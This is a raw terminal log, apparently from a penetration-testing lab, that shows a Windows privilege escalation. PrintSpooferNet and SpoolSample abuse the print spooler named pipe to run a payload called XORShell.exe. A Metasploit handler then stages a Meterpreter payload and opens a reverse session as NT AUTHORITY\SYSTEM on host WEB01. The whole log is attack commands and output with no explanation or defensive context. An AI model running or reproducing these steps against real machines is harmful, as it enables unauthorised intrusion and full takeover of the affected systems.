C:\Windows\Tasks>.\PrintSpooferNet.exe \\.\pipe\test\pipe\spoolss "C:\Windows\Tasks\XORShell.exe"
^Z
Background channel 4? [y/N]  y
meterpreter > shell
Process 1304 created.
Channel 6 created.
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\Tasks>.\SpoolSample.exe sql11 sql11/pipe/test
.\SpoolSample.exe web01 web01/pipe/test
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function

C:\Windows\Tasks>
[!] https://xxx.xxx.xxx.xxx:443 handling request from xxx.xxx.xxx.xxx; (UUID: qqhdhp6e) Without a database connected that payload UUID tracking will not work!
[*] https://xxx.xxx.xxx.xxx:443 handling request from xxx.xxx.xxx.xxx; (UUID: qqhdhp6e) Staging x64 payload (201820 bytes) ...
[!] https://xxx.xxx.xxx.xxx:443 handling request from xxx.xxx.xxx.xxx; (UUID: qqhdhp6e) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 3 opened (xxx.xxx.xxx.xxx:443 -> xxx.xxx.xxx.xxx:49767) at 2023-11-24 12:10:09 +0000

C:\Windows\Tasks>^Z
Background channel 6? [y/N]  y
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                         Connection
  --  ----  ----                     -----------                         ----------
  2         meterpreter x64/windows  IIS APPPOOL\DefaultAppPool @ WEB01  xxx.xxx.xxx.xxx:443 -> xxx.xxx.xxx.xxx:49723 (xxx.xxx.xxx.xxx)
  3         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WEB01         xxx.xxx.xxx.xxx:443 -> xxx.xxx.xxx.xxx:49767 (xxx.xxx.xxx.xxx)

